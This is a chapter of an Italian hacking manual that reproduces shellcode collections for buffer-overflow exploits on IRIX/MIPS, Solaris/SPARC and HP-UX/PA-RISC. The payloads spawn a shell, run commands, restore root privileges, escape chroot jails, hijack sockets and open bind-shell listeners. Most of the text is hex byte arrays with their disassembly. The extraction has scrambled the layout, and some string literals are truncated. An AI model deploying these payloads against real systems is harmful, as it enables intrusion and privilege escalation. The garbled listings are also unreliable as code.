
Hackers Programming Book

Codici assembler per usi legati ai buffers


Fino ad ora abbiamo parlato delle tecniche che avrebbero dovuto permettere di inserire
dentro a dei buffers i codici da fare eseguire tramite la sovrascrittura degli indirizzi di ritorno.
In altre parole all'interno dei vari buffer overflow è necessario inserire dei codici assembler
per cui il problema è spesso quello di non essere in grado di scrivere le varie parti di codice
che chiaramente devono essere specifiche per il processore attaccato.
Mediante le varie routine di analisi è necessario cercare di capire anche l'architettura
interessata in quanto chiaramente un codice scritto in assembler per un sistema LINUX su
architettura X86 non funzionerà su un processore MIPS.
Qui di seguito vi riporto i codici assembler per vari scopi e varie architetture.
In generale gli scopi sono questi :
Shell Execution:

execl(/bin/sh, /bin/sh, 0);

Shell Single Command Execution:

execl(/bin/sh, /bin/sh, -c,

Privilege Restoration:

setuid(0);
seteuid(0);
setreuid(getuid(), 0);
setreuid(0,0);
setresuid(0,0,0);

Chroot Limited Environment Escape:

mkdir(a..., mode);
chroot(a..);
for(I=257;I--;I>0) chdir(..);
chroot(.);

Find Socket Code (findsckcode):

j=sizeof(sockaddr_in);
for(i=256;i>=0;i--){
if(getpeername(sck,&adr,&j)==-1)
continue;
if(*((unsigned
short)&(adr[2]))==htons(port))
break;
}
for(j=2;j>=0;j--) dup2(j,i);

Network server code (bindsckcode):

sck=socket(AF_INET,SOCK_STREAM,0);
bind(sck,addr,sizeof(addr));
listen(sck,5);
clt=accept(sck,NULL,0);
for(i=2;i>=0;i--) dup2(i,clt);

Stack pointer retrieval (jump):

int sp=(*(int(*)())jump)();

cmd,

0);

Ad ogni modo la codifica assembler la potete trovare nelle pagine che seguono; i codici sono riassunti
nella seguente tabella.
processor
---------mips
sparc
parisc
powerpc
alpha
x86
x86
x86
x86
x86
x86
x86
x86

system
----------irix
solaris
hp-ux
aix
ultrix
solaris
beos
linux
openbsd
freebsd
netbsd
openserver
unixware

version
---------------------------------------5.3 6.2 6.3 6.4 6.5 6.5.10
2.6 2.7 2.8
10.20
4.1 4.2 4.3
5.0
2.6 2.7 2.8
5.0
6.2 (redhat)
2.8
3.4
1.5
5.0.4
7.0

p S C P R F B
------------- x x x x x x
- x x x x x x
- x x x x x x
x x x x x x x
- x x x - - x x x x x x x
- x x - - - - x x x x x x
- x x x x x x
- x x x x x x
- x x x x x x
x x x x x - x x x x x x -

(C) Copyright 2002 Flavio Bernadotti HackersBook@crackinguniversity2000.it

Hackers Programming Book

Dove le lettere specificano :


p
S
C
P
R
F
B

prefix
interactive shell
single command
restore privileges
escape chroot jail
find socket
bind socket

IRIX/MIPS codes, file: mips-irix


/*## copyright LAST STAGE OF DELIRIUM feb 2001 poland
/*## asmcodes for irix 5.3 6.2 6.3 6.4 6.5 6.5.10 mips
/*
syscall
----------execv
execv
getuid
setreuid
mkdir
chroot
chdir
getpeername
socket
bind
listen
accept
close
dup
*/

%v0
---x3f3
x3f3
x400
x464
x438
x425
x3f4
x445
x453
x442
x448
x441
x3ee
x411

*://lsd-pl.net/ #*/
#*/

%a0,%a1,%a2,%a3
--------------------------------------------------------------->path="/bin/sh",->[->a0=path,0]
->path="/bin/sh",->[->a0=path,->a1="-c",->a2=cmd,0]
ruid,euid=0
->path="a..",mode= (each value is valid)
->path={"a..","."}
->path=".."
sfd,->sadr=[],->[len=605028752]
AF_INET=2,SOCK_STREAM=2,prot=0
sfd,->sadr=[0x30,2,hi,lo,0,0,0,0],len=0x10
sfd,backlog=5
sfd,0,0
fd={0,1,2}
sfd

#if defined(MIPS) && defined(IRIX)


/* IRIX/MIPS interactive shell: execv("/bin/sh", {"/bin/sh", 0}) via syscall
 * $v0=1011 (0x3f3 in the table above).  The code locates "/bin/sh" relative to
 * $ra (bltzal/addi in the disassembly below) and stores the argv pointers next
 * to it.  Payload is 9*4+7 = 43 bytes; sizeof shellcode is 44 because the string
 * literal appends a terminating NUL. */
char shellcode[]=
"\x04\x10\xff\xff"
"\x24\x02\x03\xf3"
"\x23\xff\x01\x14"
"\x23\xe4\xff\x08"
"\x23\xe5\xff\x10"
"\xaf\xe4\xff\x10"
"\xaf\xe0\xff\x14"
"\xa3\xe0\xff\x0f"
"\x03\xff\xff\xcc"
"/bin/sh"
;

/*
/*
/*
/*
/*
/*
/*
/*
/*
/*

9*4+7 bytes
bltzal $zero,<shellcode>
li
$v0,1011
addi
$ra,$ra,276
addi
$a0,$ra,-248
addi
$a1,$ra,-220
sw
$a0,-220($ra)
sw
$zero,-236($ra)
sb
$zero,-241($ra)
syscall

*/
*/
*/
*/
*/
*/
*/
*/
*/
*/

/* IRIX/MIPS single command: execv("/bin/sh", {"/bin/sh", "-c", cmd, 0}) with
 * the command text appended after the prefix (the "command" slot below).  The
 * two `sb $zero` stores in the disassembly NUL-terminate "/bin/sh" (prefix+7)
 * and "-c" (prefix+10) in place, and $a2 is pointed at prefix+12, so the
 * original prefix is presumably 12 bytes ("-c" followed by two spaces) as the
 * "14*4+12+cmdlen" count says; the literal shown here has 11 — a trailing space
 * was probably lost in extraction.  Verify against the original source. */
char cmdshellcode[]=
"\x04\x10\xff\xff"
"\x24\x02\x03\xf3"
"\x23\xff\x08\xf0"
"\x23\xe4\xf7\x40"
"\x23\xe5\xfb\x24"
"\xaf\xe4\xfb\x24"
"\x23\xe6\xf7\x48"
"\xaf\xe6\xfb\x28"
"\x23\xe6\xf7\x4c"
"\xaf\xe6\xfb\x2c"
"\xaf\xe0\xfb\x30"
"\xa3\xe0\xf7\x47"
"\xa3\xe0\xf7\x4a"
"\x03\xff\xff\xcc"
"/bin/sh -c "
/* command */
;

/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*

14*4+12+cmdlen bytes
bltzal $zero,<cmdshellcode>
li
$v0,1011
addi
$ra,$ra,2288
addi
$a0,$ra,-2240
addi
$a1,$ra,-1244
sw
$a0,-1244($ra)
addi
$a2,$ra,-2232
sw
$a2,-1240($ra)
addi
$a2,$ra,-2228
sw
$a2,-1236($ra)
sw
$zero,-1232($ra)
sb
$zero,-2233($ra)
sb
$zero,-2230($ra)
syscall

*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/

char setreuidcode[]=
"\x24\x02\x04\x01"
"\x20\x42\xff\xff"
"\x03\xff\xff\xcc"
"\x30\x44\xff\xff"

/*
/*
/*
/*
/*

7*4 bytes
li
$v0,1024+1
addi
$v0,$v0,-1
syscall
andi
$a0,$v0,0xffff

*/
*/
*/
*/
*/

(C) Copyright 2002 Flavio Bernadotti HackersBook@crackinguniversity2000.it

Hackers Programming Book


/* andi
$a1,$zero,0xffff
/* li
$v0,1124
/* syscall

*/
*/
*/

/* IRIX/MIPS chroot escape: mkdir(path) ($v0=1080=0x438), chroot(path)
 * (1061=0x425), a counted chdir("..") loop ($s1 starts at 257; 1012=0x3f4) and
 * a final chroot(".").  The leading "\x30\x61.." word doubles as the inline
 * "a.." path bytes that the $ra-relative loads address (offsets -11/-10/-9 in
 * the disassembly below).  18*4 = 72 bytes, 73 with the literal's NUL. */
char chrootcode[]=
"\x30\x61.."
"\x04\x10\xff\xff"
"\xaf\xe0\xff\xf8"
"\x23\xe4\xff\xf5"
"\x24\x02\x04\x38"
"\x03\xff\xff\xcc"
"\x23\xe4\xff\xf5"
"\x24\x02\x04\x25"
"\x03\xff\xff\xcc"
"\x24\x11\x01\x01"
"\x23\xe4\xff\xf6"
"\x24\x02\x03\xf4"
"\x03\xff\xff\xcc"
"\x22\x31\xff\xff"
"\x06\x21\xff\xfb"
"\x23\xe4\xff\xf7"
"\x24\x02\x04\x25"
"\x03\xff\xff\xcc"
;

/* 18*4 bytes

*/

/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*

bltzal
sw
addi
li
syscall
addi
li
syscall
li
addi
li
syscall
addi
bgez
addi
li
syscall

*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/

/* IRIX/MIPS find-socket: calls getpeername ($v0=1093=0x445) on candidate
 * descriptors until the peer port equals the 16-bit value at byte offset 30
 * (FINDSCKPORTOFS; the `li $t4,0x1234` placeholder), then close (1006=0x3ee)
 * and dup (1041=0x411) the match onto fds 2..0.  29*4 = 116 bytes, 117 with the
 * literal's NUL.  The descriptor range and loop structure are only as the
 * disassembly below shows them. */
char findsckcode[]=
"\x04\x10\xff\xff"
"\x24\x10\x01\x90"
"\x22\x11\x01\x9c"
"\x22\x0d\xfe\x94"
"\x03\xed\x68\x20"
"\x01\xa0\xf0\x09"
"\x97\xeb\xff\xc2"
"\x24\x0c\x12\x34"
"\x01\x6c\x58\x23"
"\x22\x0d\xfe\xbc"
"\x11\x60\xff\xf9"
"\x22\x24\xfe\xd4"
"\x23\xe5\xff\xc0"
"\x23\xe6\xff\xfc"
"\x24\x02\x04\x45"
"\x03\xff\xff\xcc"
"\x22\x31\xff\xff"
"\x10\xe0\xff\xf4"
"\x22\x2b\xfe\xd4"
"\x1d\x60\xff\xf7"
"\x22\x04\xfe\x72"
"\x24\x02\x03\xee"
"\x03\xff\xff\xcc"
"\x22\x24\xfe\xd5"
"\x24\x02\x04\x11"
"\x03\xff\xff\xcc"
"\x22\x10\xff\xff"
"\x22\x0b\xfe\x72"
"\x05\x61\xff\xf7"
;

/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*

29*4 bytes
bltzal $zero,<findsckcode>
li
$s0,400
addi
$s1,$s0,412
addi
$t5,$s0,-(400-36)
add
$t5,$ra,$t5
jalr
$s8,$t5
lhu
$t3,-62($ra)
li
$t4,0x1234
subu
$t3,$t3,$t4
addi
$t5,$s0,-(400-76)
beqz
$t3,<findsckcode+16>
addi
$a0,$s1,-300
addi
$a1,$ra,-64
addi
$a2,$ra,-4
li
$v0,1093
syscall
addi
$s1,$s1,-1
beqz
$a3,<findsckcode+24>
addi
$t3,$s1,-300
bgzt
$t3,<findsckcode+44>
addi
$a0,$s0,-398
li
$v0,1006
syscall
addi
$a0,$s1,-299
li
$v0,1041
syscall
addi
$s0,$s0,-1
addi
$t3,$s0,-398
bgez
$t3,<findsckcode+80>

char bindsckcode[]=
"\x30\x02\x12\x34"
"\x04\x10\xff\xff"
"\x24\x11\x01\xff"
"\xaf\xe0\xff\xf8"
"\x22\x24\xfe\x03"
"\x22\x25\xfe\x03"
"\x22\x26\xfe\x01"
"\x24\x02\x04\x53"
"\x03\xff\xff\xcc"
"\x30\x44\xff\xff"
"\x23\xe5\xff\xf4"
"\x22\x26\xfe\x11"
"\x24\x02\x04\x42"
"\x03\xff\xff\xcc"
"\x22\x25\xfe\x06"
"\x24\x02\x04\x48"
"\x03\xff\xff\xcc"
"\x22\x25\xfe\x01"

/* 31*4 bytes

*/

/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*

*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/

"\x30\x05\xff\xff"
"\x24\x02\x04\x64"
"\x03\xff\xff\xcc"

bltzal
li
sw
addi
addi
addi
li
syscall
andi
addi
addi
li
syscall
addi
li
syscall
addi

$zero,<chrootcode+4>
$zero,-8($ra)
$a0,$ra,-11
$v0,1080
$a0,$ra,-11
$v0,1061
$s1,257
$a0,$ra,-10
$v0,1012
$s1,$s1,-1
$s1,<chrootcode+40>
$a0,$ra,-9
$v0,1061

$zero,<bindsckcode+4>
$s1,511
$zero,-8($ra)
$a0,$s1,-509
$a1,$s1,-509
$a2,$s1,-511
$v0,1107
$a0,$v0,0xffff
$a1,$ra,-12
$a2,$s1,-(511-16)
$v0,1090
$a1,$s1,-506
$v0,1096
$a1,$s1,-511

*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/

(C) Copyright 2002 Flavio Bernadotti HackersBook@crackinguniversity2000.it

Hackers Programming Book

"\x22\x26\xfe\x01"
"\x24\x02\x04\x41"
"\x03\xff\xff\xcc"
"\x02\x22\x98\x20"
"\x22\x32\xfe\x03"
"\x02\x40\x20\x25"
"\x24\x02\x03\xee"
"\x03\xff\xff\xcc"
"\x22\x64\xfe\x01"
"\x24\x02\x04\x11"
"\x03\xff\xff\xcc"
"\x22\x52\xff\xff"
"\x06\x41\xff\xf8"

/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*

addi
li
syscall
add
addi
move
li
syscall
addi
li
syscall
addi
bgez

/* IRIX/MIPS stack-pointer probe: `move $v0,$sp; jr $ra` — returns $sp to a
 * caller that invokes this buffer as a function (the `jump` usage in the
 * introduction).  8 bytes plus the literal's NUL.  NOTE(review): calling a data
 * array as code only works where that memory is mapped executable. */
char jump[]=
"\x03\xa0\x10\x25"
"\x03\xe0\x00\x08"
;

/* move
/* jr

#define FINDSCKPORTOFS
#define BINDSCKPORTOFS

30
2

$a2,$s1,-511
$v0,1089

$s2,$s2,-1
$s2,<bindsckcode+92>

*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/

$v0,$sp
$ra

*/
*/

$s3,$s1,$v0
$s2,$s1,-509
$a0,$s2
$v0,1006
$a0,$s3,-511
$v0,1041

#endif

Solaris/SPARC codes, file: sparc-solaris


/*## copyright LAST STAGE OF DELIRIUM feb 2001 poland
/*## asmcodes for solaris 2.6 2.7 2.8 sparc
/*
syscall
----------exec
exec
setuid
mkdir
chroot
chdir
ioctl
so_socket
bind
listen
accept
fcntl
*/

%g1
---x00b
x00b
x017
x050
x03d
x00c
x036
x0e6
x0e8
x0e9
x0ea
x03e

*://lsd-pl.net/ #*/
#*/

%o0,%o1,%o2,%o3,%o4
--------------------------------------------------------------->path="/bin/ksh",->[->a0=path,0]
->path="/bin/ksh",->[->a0=path,->a1="-c",->a2=cmd,0]
uid=0
->path="b..",mode= (each value is valid)
->path={"b..","."}
->path=".."
sfd,TI_GETPEERNAME=0x5491,->[mlen=0x54,len=0x54,->sadr=[]]
AF_INET=2,SOCK_STREAM=2,prot=0,devpath=0,SOV_DEFAULT=1
sfd,->sadr=[0x33,2,hi,lo,0,0,0,0],len=0x10,SOV_SOCKSTREAM=2
sfd,backlog=5,vers= (not required in this syscall)
sfd,0,0,vers= (not required in this syscall)
sfd,F_DUP2FD=0x09,fd={0,1,2}

#if defined(SPARC) && defined(SOLARIS)


#ifdef ABOVE_SPARCV8PLUS
/* Solaris/SPARC interactive shell, v8plus-or-later variant: `rd %pc,%o7` (the
 * "! >= sparcv8+" note in the disassembly) replaces the bn,a/bn,a/call
 * position-finding preamble of the generic variant, then exec("/bin/ksh",
 * {path, 0}) with %g1=0x0b and `ta 8`.  8*4+8 = 40 bytes; sizeof is 41 with the
 * literal's NUL.  NOTE(review): if ABOVE_SPARCV8PLUS is defined, this
 * `shellcode` and the unconditional one that follows are both compiled,
 * redefining the symbol — presumably an `#else` was lost here; check the
 * original. */
char shellcode[]=
"\x9f\x41\x40\x01"
"\x90\x03\xe0\x20"
"\x92\x02\x20\x10"
"\xc0\x22\x20\x08"
"\xd0\x22\x20\x10"
"\xc0\x22\x20\x14"
"\x82\x10\x20\x0b"
"\x91\xd0\x20\x08"
"/bin/ksh"
;
#endif
char shellcode[]=
"\x20\xbf\xff\xff"
"\x20\xbf\xff\xff"
"\x7f\xff\xff\xff"
"\x90\x03\xe0\x20"
"\x92\x02\x20\x10"
"\xc0\x22\x20\x08"
"\xd0\x22\x20\x10"
"\xc0\x22\x20\x14"
"\x82\x10\x20\x0b"
"\x91\xd0\x20\x08"

/*
/*
/*
/*
/*
/*
/*
/*
/*

8*4+8 bytes
*/
rd
%pc,%o7 ! >= sparcv8+ */
add
%o7,32,%o0
*/
add
%o0,16,%o1
*/
st
%g0,[%o0+8]
*/
st
%o0,[%o0+16]
*/
st
%g0,[%o0+20]
*/
mov
0x0b,%g1
*/
ta
8
*/

/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*

10*4+8 bytes
bn,a
<shellcode-4>
bn,a
<shellcode>
call
<shellcode+4>
add
%o7,32,%o0
add
%o0,16,%o1
st
%g0,[%o0+8]
st
%o0,[%o0+16]
st
%g0,[%o0+20]
mov
0x0b,%g1
ta
8

*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/

(C) Copyright 2002 Flavio Bernadotti HackersBook@crackinguniversity2000.it

Hackers Programming Book

"/bin/ksh"

/* Solaris/SPARC single command: exec("/bin/ksh", {path, "-c", cmd, 0}),
 * %g1=0x0b, `ta 8`.  The disassembly below stores NULs at prefix+8 and
 * prefix+14 and points %l1/%l2 at prefix+12/prefix+16, i.e. the original prefix
 * is 16 bytes ("/bin/ksh", padding, "-c", padding) as "15*4+16+cmdlen" states.
 * The literal shown here was split across two lines and lost its padding in
 * extraction, so as written it is not a valid C string literal; the original
 * source is needed to reconstruct the exact padding. */
char cmdshellcode[]=
"\x20\xbf\xff\xff"
"\x20\xbf\xff\xff"
"\x7f\xff\xff\xff"
"\x90\x03\xe0\x34"
"\x92\x23\xe0\x20"
"\xa2\x02\x20\x0c"
"\xa4\x02\x20\x10"
"\xc0\x2a\x20\x08"
"\xc0\x2a\x20\x0e"
"\xd0\x23\xff\xe0"
"\xe2\x23\xff\xe4"
"\xe4\x23\xff\xe8"
"\xc0\x23\xff\xec"
"\x82\x10\x20\x0b"
"\x91\xd0\x20\x08"
"/bin/ksh
-c "
/* command */
;

/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*

15*4+16+cmdlen bytes
bn,a
<cmdshellcode-4>
bn,a
<cmdshellcode>
call
<cmdshellcode+4>
add
%o7,52,%o0
sub
%o7,32,%o1
add
%o0,12,%l1
add
%o0,16,%l2
stb
%g0,[%o0+8]
stb
%g0,[%o0+14]
st
%o0,[%o7-32]
st
%l1,[%o7-28]
st
%l2,[%o7-24]
st
%g0,[%o7-20]
mov
0x0b,%g1
ta
8

*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/

/* Solaris/SPARC setuid(0): `and %g0,1,%o0` yields %o0=0 (presumably preferred
 * over a plain zero move to avoid a NUL byte), %g1=0x17 (setuid), `ta 8`.
 * 3*4 = 12 bytes, 13 with the literal's NUL. */
char setuidcode[]=
"\x90\x08\x20\x01"
"\x82\x10\x20\x17"
"\x91\xd0\x20\x08"
;

/*
/*
/*
/*

3*4 bytes
and
%g0,1,%o0
mov
0x17,%g1
ta
8

*/
*/
*/
*/

/* Solaris/SPARC chroot escape: bn,a/bn,a/call preamble to learn the code
 * address, then mkdir (%g1=0x50), chroot (0x3d), a counted chdir("..") loop
 * (0x0c, counter in %l5) and a final chroot.  Word 4 ("\x80\x61..") carries the
 * directory name bytes inline; `stb %g0,[%o7+8]` terminates them.  20*4 = 80
 * bytes, 81 with the literal's NUL. */
char chrootcode[]=
"\x20\xbf\xff\xff"
"\x20\xbf\xff\xff"
"\x7f\xff\xff\xff"
"\x80\x61.."
"\xc0\x2b\xe0\x08"
"\x90\x03\xe0\x05"
"\x82\x10\x20\x50"
"\x91\xd0\x20\x08"
"\x90\x03\xe0\x05"
"\x82\x10\x20\x3d"
"\x91\xd0\x20\x08"
"\xaa\x20\x3f\xe0"
"\x90\x03\xe0\x06"
"\x82\x10\x20\x0c"
"\xaa\x85\x7f\xff"
"\x12\xbf\xff\xfd"
"\x91\xd0\x20\x08"
"\x90\x03\xe0\x07"
"\x82\x10\x20\x3d"
"\x91\xd0\x20\x08"
;

/*
/*
/*
/*

20*4 bytes
bn,a
<chrootcode-4>
bn,a
<chrootcode>
call
<chrootcode+4>

*/
*/
*/
*/

/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*

stb
add
mov
ta
add
mov
ta
sub
add
mov
addcc
ble
ta
add
mov
ta

%g0,[%o7+8]
%o7,5,%o0
0x50,%g1
8
%o7,5,%o0
0x3d,%g1
8
%g0,-32,%l5
%o7,6,%o0
0x0c,%g1
%l5,-1,%l5
<chrootcode+48>
8
%o7,7,%o0
0x3d,%g1
8

*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/

char findsckcode[]=
"\x20\xbf\xff\xff"
"\x20\xbf\xff\xff"
"\x7f\xff\xff\xff"
"\x33\x02\x12\x34"
"\xa0\x10\x20\xff"
"\xa2\x10\x20\x54"
"\xa4\x03\xff\xd0"
"\xaa\x03\xe0\x28"
"\x81\xc5\x60\x08"
"\xc0\x2b\xe0\x04"
"\xe6\x03\xff\xd0"
"\xe8\x03\xe0\x04"
"\xa8\xa4\xc0\x14"
"\x02\xbf\xff\xfb"
"\xaa\x03\xe0\x5c"
"\xe2\x23\xff\xc4"
"\xe2\x23\xff\xc8"
"\xe4\x23\xff\xcc"
"\x90\x04\x20\x01"
"\xa7\x2c\x60\x08"
"\x92\x14\xe0\x91"
"\x94\x03\xff\xc4"
"\x82\x10\x20\x36"
"\x91\xd0\x20\x08"

/*
/*
/*
/*

35*4 bytes
bn,a
<findsckcode-4>
bn,a
<findsckcode>
call
<findsckcode+4>

*/
*/
*/
*/

/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*

mov
mov
add
add
jmp
stb
ld
ld
subcc
bz
add
st
st
st
add
sll
or
add
mov
ta

*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/

0xff,%l0
0x54,%l1
%o7,-48,%l2
%o7,40,%l5
%l5+8
%g0,[%o7+4]
[%o7-48],%l3
[%o7+4],%l4
%l3,%l4,%l4
<findsckcode+32>
%o7,92,%l5
%l1,[%o7-60]
%l1,[%o7-56]
%l2,[%o7-52]
%l0,1,%o0
%l1,8,%l3
%l3,0x91,%o1
%o7,-60,%o2
0x36,%g1
8

(C) Copyright 2002 Flavio Bernadotti HackersBook@crackinguniversity2000.it

Hackers Programming Book


"\x1a\xbf\xff\xf1"
"\xa0\xa4\x20\x01"
"\x12\xbf\xff\xf5"
"\xa6\x10\x20\x03"
"\x90\x04\x20\x02"
"\x92\x10\x20\x09"
"\x94\x04\xff\xff"
"\x82\x10\x20\x3e"
"\xa6\x84\xff\xff"
"\x12\xbf\xff\xfb"
"\x91\xd0\x20\x08"

/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*

bcc
deccc
bne
mov
add
mov
add
mov
addcc
bne
ta

/* Solaris/SPARC bind shell: so_socket (%g1=0xe6), bind (0xe8), listen (0xe9),
 * accept (0xea), then fcntl F_DUP2FD (0x3e) three times (%l3 counts down from
 * 3) onto fds 2..0.  The listening port is the 16-bit value at byte offset 14
 * (BINDSCKPORTOFS; the 0x1234 in word 4).  34*4 = 136 bytes, 137 with the
 * literal's NUL. */
char bindsckcode[]=
"\x20\xbf\xff\xff"
"\x20\xbf\xff\xff"
"\x7f\xff\xff\xff"
"\x33\x02\x12\x34"
"\x90\x10\x20\x02"
"\x92\x10\x20\x02"
"\x94\x08\x20\x01"
"\x96\x08\x20\x01"
"\x98\x10\x20\x01"
"\x82\x10\x20\xe6"
"\x91\xd0\x20\x08"
"\xa2\x22\x3f\xff"
"\xc0\x23\xe0\x08"
"\x92\x03\xe0\x04"
"\x94\x10\x20\x10"
"\x96\x10\x20\x02"
"\x82\x10\x20\xe8"
"\x91\xd0\x20\x08"
"\x90\x04\x7f\xff"
"\x92\x10\x20\x05"
"\x82\x10\x20\xe9"
"\x91\xd0\x20\x08"
"\x90\x04\x7f\xff"
"\x92\x08\x20\x01"
"\x94\x08\x20\x01"
"\x82\x10\x20\xea"
"\x91\xd0\x20\x08"
"\xa6\x10\x20\x03"
"\x92\x10\x20\x09"
"\x94\x04\xff\xff"
"\x82\x10\x20\x3e"
"\xa6\x84\xff\xff"
"\x12\xbf\xff\xfc"
"\x91\xd0\x20\x08"
;

/*
/*
/*
/*

34*4 bytes
bn,a
<bindsckcode-4>
bn,a
<bindsckcode>
call
<bindsckcode+4>

*/
*/
*/
*/

/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*

mov
mov
and
and
mov
mov
ta
sub
st
add
mov
mov
mov
ta
add
mov
mov
ta
add
and
and
mov
ta
mov
mov
add
mov
addcc
bne
ta

0x02,%o0
0x02,%o1
%g0,1,%o2
%g0,1,%o3
0x01,%o4
0xe6,%g1
8
%o0,-1,%l1
%g0,[%o7+8]
%o7,4,%o1
0x10,%o2
0x02,%o3
0xe8,%g1
8
%l1,-1,%o0
0x05,%o1
0xe9,%g1
8
%l1,-1,%o0
%g0,1,%o1
%g0,1,%o2
0xea,%g1
8
0x03,%l3
0x09,%o1
%l3,-1,%o2
0x3e,%g1
%l3,-1,%l3
<bindsckcode+112>
8

*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/

%o7+8
%sp,%o0

*/
*/

/* Solaris/SPARC stack-pointer probe: `jmp %o7+8` with `mov %sp,%o0` in the
 * delay slot, so the caller receives %sp in %o0.  8 bytes plus the literal's
 * NUL.  NOTE(review): only meaningful where the array's memory is executable. */
char jump[]=
"\x81\xc3\xe0\x08"
"\x90\x10\x00\x0e"
;

/* jmp
/* mov

#define FINDSCKPORTOFS
#define BINDSCKPORTOFS

14
14

<findsckcode+36>
%l0
<findsckcode+60>
0x03,%l3
%l0,2,%o0
0x09,%o1
%l3,-1,%o2
0x3e,%g1
%l3,-1,%l3
<findsckcode+112>
8

*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/

#endif

HP-UX/PA-RISC codes, file: parisc-hpux


/*## copyright LAST STAGE OF DELIRIUM feb 2001 poland
/*## asmcodes for hp-ux 10.20 parisc
/*
syscall
----------execv
execv
setresuid
mkdir
chroot
chdir
getpeername
socket

%r22
---x00b
x00b
x07e
x088
x03d
x00c
x116
x122

*://lsd-pl.net/ #*/
#*/

%r26,%r25,%r24,%r23
--------------------------------------------------------------->path="/bin/sh",0
->path="/bin/sh",->[->a0=path,->a1="-c",->a2=cmd,0]
0,0,0
->path="a..",mode= (each value is valid)
->path={"a..","."}
->path=".."
sfd,->sadr=[],->[0x10]
AF_INET=2,SOCK_STREAM=1,prot=0

(C) Copyright 2002 Flavio Bernadotti HackersBook@crackinguniversity2000.it

Hackers Programming Book


bind
listen
accept
dup2
*/

x114
x119
x113
x05a

sfd,->sadr=[0x61,2,hi,lo,0,0,0,0],len=0x10
sfd,backlog=5
sfd,0,0
sfd,fd={0,1,2}

#if defined(PARISC) && defined(HPUX)


/* HP-UX/PA-RISC interactive shell: execv("/bin/sh", 0) — %r25 zeroed with xor,
 * %r26 pointed at the inline "/bin/sh" (bl sets it, addi,< adjusts it), syscall
 * %r22=0x0b through the 0xc0000004 gateway (ldil/ble).  7*4+7 payload bytes;
 * the "7*4+8" in the disassembly counts the literal's NUL (sizeof is 36). */
char shellcode[]=
"\xeb\x5f\x1f\xfd"
"\x0b\x39\x02\x99"
"\xb7\x5a\x40\x22"
"\x0f\x40\x12\x0e"
"\x20\x20\x08\x01"
"\xe4\x20\xe0\x08"
"\xb4\x16\x70\x16"
"/bin/sh"
;

/*
/*
/*
/*
/*
/*
/*
/*

7*4+8 bytes
bl
<shellcode+4>,%r26
xor
%r25,%r25,%r25
addi,< 0x11,%r26,%r26
stbs
%r0,7(%r26)
ldil
L%0xc0000004,%r1
ble
R%0xc0000004(%sr7,%r1)
addi,> 0xb,%r0,%r22

*/
*/
*/
*/
*/
*/
*/
*/

/* HP-UX/PA-RISC single command: execv("/bin/sh", argv) with argv built at
 * %r26-0x34.  The stbs at prefix+7 and prefix+0xa terminate "/bin/sh" and "-c",
 * and %r21 = prefix+0xc is the command, so the original prefix is presumably 12
 * bytes ("-c" followed by two spaces); the literal here has 11, so the
 * "14*4+12+cmdlen" count appears to assume a trailing space lost in extraction.
 * sizeof as written is 68. */
char cmdshellcode[]=
"\xeb\x5f\x1f\xfd"
"\x20\x20\x08\x01"
"\xb7\x5a\x40\x5a"
"\xb7\x56\x40\x10"
"\xb7\x55\x40\x18"
"\x0f\x40\x12\x0e"
"\x0f\x40\x12\x14"
"\x6b\x5a\x3f\x99"
"\x6b\x56\x3f\xa1"
"\x6b\x55\x3f\xa9"
"\x6b\x40\x3f\xb1"
"\xb7\x59\x47\x99"
"\xe4\x20\xe0\x08"
"\xb4\x16\x70\x16"
"/bin/sh -c "
/* command */
;

/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*

14*4+12+cmdlen bytes
bl
<cmdshellcode+4>,%r26
ldil
L%0xc0000004,%r1
addi,< 0x2d,%r26,%r26
addi,< 0x8,%r26,%r22
addi,< 0xc,%r26,%r21
stbs
%r0,0x7(%r26)
stbs
%r0,0xa(%r26)
stw
%r26,-0x34(%r26)
stw
%r22,-0x30(%r26)
stw
%r21,-0x2c(%r26)
stw
%r0, -0x28(%r26)
addi,< -0x34,%r26,%r25
ble
R%0xc0000004(%sr7,%r1)
addi,> 0x0b,%r0,%r22

*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/

/* HP-UX/PA-RISC setresuid(0,0,0): %r26/%r25/%r24 cleared with xor, %r22=0x7e,
 * entered through the 0xc0000004 gateway.  6*4 = 24 bytes, 25 with the
 * literal's NUL. */
char setresuidcode[]=
"\x0b\x5a\x02\x9a"
"\x0b\x39\x02\x99"
"\x0b\x18\x02\x98"
